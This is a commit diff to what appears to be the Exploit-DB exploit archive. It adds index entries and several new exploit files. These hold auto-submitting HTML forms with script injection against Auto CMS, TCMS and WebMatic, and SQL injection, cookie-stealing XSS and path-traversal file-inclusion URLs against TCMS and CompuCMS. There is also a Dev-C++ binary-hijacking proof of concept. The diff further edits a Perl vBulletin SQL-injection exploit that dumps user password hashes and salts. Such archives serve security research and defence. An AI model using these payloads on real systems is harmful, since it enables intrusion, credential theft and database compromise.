Updated 09_06_2014
This commit is contained in:
parent
c587ffef9c
commit
bdd1b1c20a
8 changed files with 217 additions and 17 deletions
|
@ -31013,7 +31013,7 @@ id,file,description,date,author,platform,type,port
|
|||
34431,platforms/linux/remote/34431.html,"Nagios XI Multiple Cross Site Request Forgery Vulnerabilities",2010-08-07,"Adam Baldwin",linux,remote,0
|
||||
34432,platforms/php/webapps/34432.txt,"Wowd 'index.html' Multiple Cross Site Scripting Vulnerabilities",2009-10-29,Lostmon,php,webapps,0
|
||||
34433,platforms/php/webapps/34433.txt,"Simple Directory Listing 2.1 'SDL2.php' Cross Site Scripting Vulnerability",2010-10-22,"Amol Naik",php,webapps,0
|
||||
34436,platforms/php/webapps/34436.txt,"WordPress ShortCode Plugin 1.1 - Local File Inclusion Vulnerability",2014-08-28,"Mehdi Karout and Christian Galeone",php,webapps,0
|
||||
34436,platforms/php/webapps/34436.txt,"WordPress ShortCode Plugin 0.2.3 - Local File Inclusion Vulnerability",2014-08-28,"Mehdi Karout and Christian Galeone",php,webapps,0
|
||||
34437,platforms/windows/remote/34437.txt,"Portable Document Format - Specification Signature Collision Vulnerability",2010-08-11,"Florian Zumbiehl",windows,remote,0
|
||||
34438,platforms/php/webapps/34438.txt,"MybbCentral TagCloud 2.0 'Topic' Field HTML Injection Vulnerability",2010-08-11,3ethicalhackers.com,php,webapps,0
|
||||
34439,platforms/multiple/remote/34439.txt,"ServletExec Directory Traversal Vulnerability and Multiple Authentication-Bypass Vulnerabilities",2010-08-12,"Stefano Di Paola",multiple,remote,0
|
||||
|
@ -31099,3 +31099,8 @@ id,file,description,date,author,platform,type,port
|
|||
34528,platforms/multiple/dos/34528.py,"Adobe Acrobat and Reader <= 9.3.4 'AcroForm.api' Memory Corruption Vulnerability",2010-08-25,ITSecTeam,multiple,dos,0
|
||||
34530,platforms/windows/dos/34530.py,"Crystal Player v1.98 '.mls' File Buffer Overflow Vulnerability",2010-08-20,"Praveen Darshanam",windows,dos,0
|
||||
34531,platforms/php/webapps/34531.txt,"BlastChat Client 3.3 Cross Site Scripting Vulnerability",2010-08-25,"Aung Khant",php,webapps,0
|
||||
34532,platforms/windows/remote/34532.c,"Bloodshed Dev-C++ 4.9.9.2 Multiple EXE Loading Arbitrary Code Execution Vulnerability",2010-08-25,storm,windows,remote,0
|
||||
34533,platforms/php/webapps/34533.txt,"Auto CMS 1.6 'autocms.php' Cross-Site Scripting Vulnerability",2010-08-23,"High-Tech Bridge SA",php,webapps,0
|
||||
34534,platforms/php/webapps/34534.txt,"TCMS Multiple Input Validation Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0
|
||||
34535,platforms/php/webapps/34535.txt,"Valarsoft WebMatic 3.0.5 Multiple HTML Injection Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0
|
||||
34536,platforms/php/webapps/34536.txt,"CompuCMS Multiple SQL Injection and Cross Site Scripting Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
|
@ -4,7 +4,7 @@
|
|||
# Severity : High+/Critical
|
||||
# Reporter(s) : Mehdi Karout & Christian Galeone
|
||||
# Google Dork : inurl:wp/wp-content/force-download.php
|
||||
# Plugin Version : 1.1
|
||||
# Plugin Version : 0.2.3
|
||||
# Plugin Name : Download ShortCode
|
||||
# Plugin Download Link : http://downloads.wordpress.org/plugin/download-shortcode.1.1.zip
|
||||
# Vendor Home : http://werdswords.com/
|
||||
|
|
|
@ -6,8 +6,7 @@
|
|||
# Tested on: vBulletin 4.1.2
|
||||
# Usage: perl exploit.pl <http://target> <valid username> <valid passwd> <existent group> <userid to hack>
|
||||
# Tutorial video: https://www.youtube.com/watch?v=_jec3nkoYFc
|
||||
# IMPORTANT: At the first execution of the exploit I suggest you to login and logout to the forum (with a browser), then running it in order to allow the exploit to retrieve the correct security token to use. If you run more than one time the exploit, it may not get the security token because of the previous session's cookies and so you may have some problems retrieving the correct information. THE SOLUTION IS to copy the correct security token previously found (usually at the first run) and paste it into the source code where I wrote 'HERE'.
|
||||
# Vulnerability discovered by: D4rkB1t (http://www.exploit-db.com/exploits/17314/)
|
||||
# Vulnerability discovered by: D4rkB1t
|
||||
|
||||
#!/usr/bin/env perl
|
||||
use LWP::UserAgent;
|
||||
|
@ -24,13 +23,14 @@ $salt = "salt) from user where userid=$ARGV[4]#";
|
|||
|
||||
sub request
|
||||
{
|
||||
$req = HTTP::Request->new(GET => $ARGV[0]);
|
||||
my $res1 = $ua->request($req);
|
||||
open(FILE01, "> vbloginout.txt"); print FILE01 $res1->content; close(FILE01);
|
||||
my $token = dumping("vbloginout.txt","token");
|
||||
|
||||
if($token eq '')
|
||||
if($token eq '' || $token eq 'guest')
|
||||
{
|
||||
print "SECURITYTOKEN not found (Make sure to log out from any other previous logged sessions before running the exploit).\n";
|
||||
#print "Attempting using 1409594055-f2133dfe1f26a36f6349eb3a946ac38c94a182e6 as token.\n";
|
||||
$token = "1409750140-51ac26286027a4bc2b2ac38a7483081c2a4b2a3e"; # HERE
|
||||
print "SECURITYTOKEN not found!\n";
|
||||
$token = "1409782759-e58c864fcc4e1ec7e23d31439af4b8cc181b789f"; # HERE
|
||||
print "Attempting using $token as token.\n";
|
||||
}
|
||||
else
|
||||
|
@ -48,7 +48,6 @@ sub request
|
|||
$post = "query=$ARGV[3]&titleonly=0&dosearch=Search+Now&memberless=0&memberlimit=&discussionless=0&discussionlimit=&messageless=0&messagelimit=&pictureless=0&picturelimit=&sortby=dateline&order=descending&group_filter_date_lteq_month=0&group_filter_date_lteq_day=1&group_filter_date_lteq_year=&group_filter_date_gteq_month=0&group_filter_date_gteq_day=1&group_filter_date_gteq_year=&saveprefs=1&s=&securitytoken=$token&dofilter=1&do=process&searchfromtype=vBForum%3ASocialGroup&contenttypeid=7&cat[0]=1) UNION SELECT concat(0x3a,0x3a,0x3a,$tofind";
|
||||
$req->content($post);
|
||||
my $res = $ua->request($req);
|
||||
#print $res->headers()->as_string; print "\n\n";
|
||||
open(FILE0, "> vbloc.txt"); print FILE0 $res->headers()->as_string; close(FILE0);
|
||||
my $location = dumping("vbloc.txt","loc");
|
||||
|
||||
|
@ -57,11 +56,10 @@ sub request
|
|||
banner();
|
||||
break;
|
||||
}
|
||||
#print "Location: $location\n";
|
||||
|
||||
my $req1 = HTTP::Request->new(GET => $location);
|
||||
$req1->content_type('application/x-www-form-urlencoded');
|
||||
my $res1 = $ua->request($req1);
|
||||
#print $res1->content; print "\n";
|
||||
open(FILE,"> vbout.txt");
|
||||
print FILE $res1->content;
|
||||
close(FILE);
|
||||
|
@ -91,7 +89,6 @@ sub second_request
|
|||
$post = "type%5B%5D=7&query=$ARGV[3]&titleonly=0&searchuser=&exactname=1&tag=&dosearch=Search+Now&searchdate=0&beforeafter=&sortby=relevance&order=descending&saveprefs=1&s=&securitytoken=$token&do=process&searchthreadid=&cat[0]=1) UNION SELECT concat(0x3a,0x3a,0x3a,$tofind";
|
||||
$req->content($post);
|
||||
my $res = $ua->request($req);
|
||||
#print $res->headers()->as_string; print "\n\n";
|
||||
open(FILE0, "> vbloc.txt"); print FILE0 $res->headers()->as_string; close(FILE0);
|
||||
my $location = dumping("vbloc.txt","loc");
|
||||
|
||||
|
@ -100,11 +97,10 @@ sub second_request
|
|||
banner();
|
||||
exit(1);
|
||||
}
|
||||
#print "Location: $location\n";
|
||||
|
||||
my $req1 = HTTP::Request->new(GET => $location);
|
||||
$req1->content_type('application/x-www-form-urlencoded');
|
||||
my $res1 = $ua->request($req1);
|
||||
#print $res1->content; print "\n";
|
||||
open(FILE,"> vbout.txt");
|
||||
print FILE $res1->content;
|
||||
close(FILE);
|
||||
|
@ -219,8 +215,6 @@ sub login(@)
|
|||
$req->content("vb_login_username=$username&vb_login_password=$password&s=&securitytoken=1409514185-74f04ec0932a6f070268bf287797b5dc0db05530&do=login&vb_login_md5password=&vb_login_md5password_utf=");
|
||||
$ua->cookie_jar({});
|
||||
my $res = $ua->request($req);
|
||||
#print "\n"; print $res->content; print "\n";
|
||||
open(FILE2,"> vbloginout.txt"); print FILE2 $res->content; close(FILE2);
|
||||
request();
|
||||
}
|
||||
|
||||
|
|
30
platforms/php/webapps/34533.txt
Executable file
30
platforms/php/webapps/34533.txt
Executable file
|
@ -0,0 +1,30 @@
|
|||
source: http://www.securityfocus.com/bid/42764/info
|
||||
|
||||
Auto CMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
Auto CMS 1.6 is vulnerable; other versions may be affected.
|
||||
|
||||
<form action="http://www.example.com/index.php" method="post" name="main" enctype="multipart/form-data" >
|
||||
|
||||
<input type="hidden" name="site_name" value="AutoCMS by Roberto Aleman" />
|
||||
<input type="hidden" name="site_url" value="index.php" />
|
||||
<input type="hidden" name="sitetitle" value='AutoCMS by Roberto Aleman"><script>alert("XSS")</script>' />
|
||||
<input type="hidden" name="admin_email" value="admin@example.com" />
|
||||
<input type="hidden" name="admin_password" value="" />
|
||||
<input type="hidden" name="css_file" value="black.css" />
|
||||
<input type="hidden" name="index_name_link" value="Index" />
|
||||
<input type="hidden" name="about_name_link" value="About" />
|
||||
<input type="hidden" name="about_content" value="put about text here" />
|
||||
<input type="hidden" name="ps_name_link" value="" />
|
||||
<input type="hidden" name="ps_content" value="put producs and services text here" />
|
||||
<input type="hidden" name="news_name_link" value="News" />
|
||||
<input type="hidden" name="news_content" value="Title Example1: Text Example1/Title Example2: Text Example2/" />
|
||||
<input type="hidden" name="contact_name_link" value="Contact" />
|
||||
<input type="hidden" name="update" value="update" />
|
||||
|
||||
</form>
|
||||
<script>
|
||||
document.main.submit();
|
||||
</script>
|
53
platforms/php/webapps/34534.txt
Executable file
53
platforms/php/webapps/34534.txt
Executable file
|
@ -0,0 +1,53 @@
|
|||
source: http://www.securityfocus.com/bid/42766/info
|
||||
|
||||
TCMS is prone to multiple input-validation vulnerabilities, including a local file-include vulnerability, a local file-disclosure vulnerability, multiple SQL-injection vulnerabilities, and multiple cross-site scripting vulnerabilities.
|
||||
|
||||
An attacker can exploit these vulnerabilities to steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, obtain potentially sensitive information, or execute arbitrary local scripts in the context of the webserver process; other attacks are also possible.
|
||||
|
||||
http://www.example.com/www/index.php?admin=1§ion=content&action=edit&id=PAGE_ID'+ANY_SQL
|
||||
http://www.example.com/www/index.php?template=home&content=home'+ANY_SQL
|
||||
http://www.example.com/www/index.php?template=forum&action=showReplies&index=1'+ANY_SQL_CODE
|
||||
http://www.example.com/www/index.php?template=blog&id=1'+ANY_SQL_CODE
|
||||
|
||||
<form action="http://www.example.com/www/index.php" method="post" name="main" >
|
||||
|
||||
<input type="hidden" name="template" value="3" />
|
||||
<input type="hidden" name="language" value="1" />
|
||||
<input type="hidden" name="name" value="home" />
|
||||
<input type="hidden" name="note" value='The note text' />
|
||||
<input type="hidden" name="value" value="page content" />
|
||||
<input type="hidden" name="admin" value="1" />
|
||||
<input type="hidden" name="text" value="1" />
|
||||
<input type="hidden" name="section" value="content" />
|
||||
<input type="hidden" name="id" value="9'+ANY_SQL_CODE" />
|
||||
<input type="hidden" name="action" value="Save text" />
|
||||
|
||||
</form>
|
||||
<script>
|
||||
document.main.submit();
|
||||
</script>
|
||||
|
||||
|
||||
<form action="http://www.example.com/www/index.php" method="post" name="main" >
|
||||
|
||||
<input type="hidden" name="template" value="3" />
|
||||
<input type="hidden" name="language" value="1" />
|
||||
<input type="hidden" name="name" value="home" />
|
||||
<input type="hidden" name="note" value='The note text"><script>alert(document.cookie)</script>' />
|
||||
<input type="hidden" name="value" value="page content" />
|
||||
<input type="hidden" name="admin" value="1" />
|
||||
<input type="hidden" name="text" value="1" />
|
||||
<input type="hidden" name="section" value="content" />
|
||||
<input type="hidden" name="id" value="9" />
|
||||
<input type="hidden" name="action" value="Save text" />
|
||||
|
||||
http://www.example.com/www/index.php?admin=1§ion=language"><script>alert(document.cookie)</script>&action=addLanguage
|
||||
|
||||
</form>
|
||||
<script>
|
||||
document.main.submit();
|
||||
</script>
|
||||
|
||||
http://www.example.com/www/index.php?template=./../../../../../../../tmp/test.php%00
|
||||
|
||||
http://www.example.com/www/index.php?admin=1§ion=style&action=editStylesheet&name=./../../../../../../../tmp/test.php
|
61
platforms/php/webapps/34535.txt
Executable file
61
platforms/php/webapps/34535.txt
Executable file
|
@ -0,0 +1,61 @@
|
|||
source: http://www.securityfocus.com/bid/42767/info
|
||||
|
||||
Valarsoft WebMatic is prone to multiple HTML-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
|
||||
|
||||
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
|
||||
|
||||
Valarsoft WebMatic 3.0.5 is vulnerable; other versions may also be affected.
|
||||
|
||||
<form action="http://www.example.com/index.php" method="post" name="main" >
|
||||
<input type="hidden" name="browser_bar_title" value="Webmatic" />
|
||||
<input type="hidden" name="title" value="Welcome to Webmatic" />
|
||||
<input type="hidden" name="special_user_label" value="Special user" />
|
||||
<input type="hidden" name="staff_name" value="Webmatic editorial staff" />
|
||||
<input type="hidden" name="home" value='Webmatic its2"><script>alert(document.cookie)</script>' />
|
||||
<input type="hidden" name="foot" value="" />
|
||||
<input type="hidden" name="signalation_email_subject" value="Subject" />
|
||||
<input type="hidden" name="signalation_email_text" value="text" />
|
||||
<input type="hidden" name="user_registration_email_subject" value="Subject" />
|
||||
<input type="hidden" name="user_registration_email_text" value="text" />
|
||||
<input type="hidden" name="send" value="Save" />
|
||||
<input type="hidden" name="languageID" value="1" />
|
||||
<input type="hidden" name="stage" value="2" />
|
||||
<input type="hidden" name="section" value="21" />
|
||||
<input type="hidden" name="action" value="578" />
|
||||
</form>
|
||||
<script>
|
||||
document.main.submit();
|
||||
</script>
|
||||
|
||||
<form action="http://www.example.com/index.php" method="post" name="main" >
|
||||
<input type="hidden" name="title" value="pagetest" />
|
||||
<input type="hidden" name="subtitle" value='some subtitle and"><script>alert(document.cookie)</script>' />
|
||||
<input type="hidden" name="enabled" value="1" />
|
||||
<input type="hidden" name="categoryID" value="1" />
|
||||
<input type="hidden" name="page_type" value="1" />
|
||||
<input type="hidden" name="visibility" value="1" />
|
||||
<input type="hidden" name="groupID" value="1" />
|
||||
<input type="hidden" name="backID" value="0" />
|
||||
<input type="hidden" name="left_panels_enabled" value="1" />
|
||||
<input type="hidden" name="right_panels_enabled" value="1" />
|
||||
<input type="hidden" name="render_mode" value="2" />
|
||||
<input type="hidden" name="head" value="" />
|
||||
<input type="hidden" name="body" value="" />
|
||||
<input type="hidden" name="hr_width" value="100" />
|
||||
<input type="hidden" name="hr_size" value="1" />
|
||||
<input type="hidden" name="hr_align" value="0" />
|
||||
<input type="hidden" name="img_picture" value="1.gif" />
|
||||
<input type="hidden" name="img_border" value="0" />
|
||||
<input type="hidden" name="a_link" value="1" />
|
||||
<input type="hidden" name="a_url" value="" />
|
||||
<input type="hidden" name="a_text" value="" />
|
||||
<input type="hidden" name="foot" value="" />
|
||||
<input type="hidden" name="send" value="Save" />
|
||||
<input type="hidden" name="stage" value="2" />
|
||||
<input type="hidden" name="section" value="14" />
|
||||
<input type="hidden" name="action" value="216" />
|
||||
<input type="hidden" name="pageID" value="2" />
|
||||
</form>
|
||||
<script>
|
||||
document.main.submit();
|
||||
</script>
|
23
platforms/php/webapps/34536.txt
Executable file
23
platforms/php/webapps/34536.txt
Executable file
|
@ -0,0 +1,23 @@
|
|||
source: http://www.securityfocus.com/bid/42773/info
|
||||
|
||||
CompuCMS is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/index.asp?mode=visresultat&sogeord=%27+ANY_SQL_CODE
|
||||
|
||||
http://www.example.com/index.asp?mode=for!forside!gb&sprog=gb'"><script>alert(document.cookie)</script>
|
||||
|
||||
http://www.example.com/_CompuCMS/_CMS_output/_viskarrusel.inc.asp?mode=alm!udflugtsmaal!dk&vispic=2138&Dir=&site=demo%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ed&NoElementNum=0&NoFirstElement
|
||||
|
||||
http://www.example.com/_CompuCMS/_CMS_output/_viskarrusel.inc.asp?mode=alm!udflugtsmaal!dk&vispic=2138&Dir=%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3C&site=demo&NoElementNum=0&NoFirstElement
|
||||
|
||||
http://www.example.com/_CompuCMS/_CMS_output/_viskarrusel.inc.asp?mode=alm!udflugtsmaal!dk%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3C&vispic=2138&Dir=&site=demo&NoElementNum=0&NoFirstElement
|
||||
|
||||
http://www.example.com/_CompuCMS/_CMS_output/_visbillede.asp?billede=1.jpg&tekst=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
|
||||
|
||||
http://www.example.com/_CompuCMS/_CMS_output/_visbillede.asp?billede=1.jpg%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&tekst=
|
||||
|
||||
http://www.example.com/_CompuCMS/_CMS_output/_viskarrusel.inc.asp?mode=alm!udflugtsmaal!dk&vispic=2138+ANY_SQL_CODE&Dir=www.compucms.dk/demo/&site=demo&NoElementNum=0&NoFirstElement
|
||||
|
||||
http://www.example.com/demo/index.asp?mode=nyh!forside~1220010667!dk&visid=383%27+ANY_SQL_CODE
|
34
platforms/windows/remote/34532.c
Executable file
34
platforms/windows/remote/34532.c
Executable file
|
@ -0,0 +1,34 @@
|
|||
source: http://www.securityfocus.com/bid/42737/info
|
||||
|
||||
Bloodshed Dev-C++ is prone to a vulnerability that lets attackers execute arbitrary code. This issue affects 'make.exe' and 'minw32-make.exe'.
|
||||
|
||||
An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to compile a file from a network share location that contains a specially crafted executable file.
|
||||
|
||||
Bloodshed Dev-C++ 4.9.9.2 is vulnerable; other versions may also be affected.
|
||||
|
||||
/*
|
||||
Exploit Title: Bloodshed Dev-C++ Binary Hijacking Exploit (make.exe, mingw32-make.exe)
|
||||
Date: August 25, 2010
|
||||
Author: storm (storm@gonullyourself.org)
|
||||
Version: 4.9.9.2
|
||||
Tested on: Windows Vista SP2
|
||||
|
||||
http://www.gonullyourself.org/
|
||||
|
||||
gcc -o make.exe Dev-C++-Binary.c
|
||||
gcc -o mingw32-make.exe Dev-C++-Binary.c
|
||||
|
||||
...and place in appropriate directory. Executes your code four times.
|
||||
|
||||
Every file extension associated with Dev-C++ (.c, .cpp, .dev, .h, .hpp, .rc, .template) is affected. Dev-C++ Package Manager files (.devpackage, .devpak) are not affected, however.
|
||||
|
||||
*/
|
||||
|
||||
#include <windows.h>
|
||||
|
||||
int main()
|
||||
{
|
||||
WinExec("calc", 0);
|
||||
exit(0);
|
||||
return 0;
|
||||
}
|
Loading…
Add table
Reference in a new issue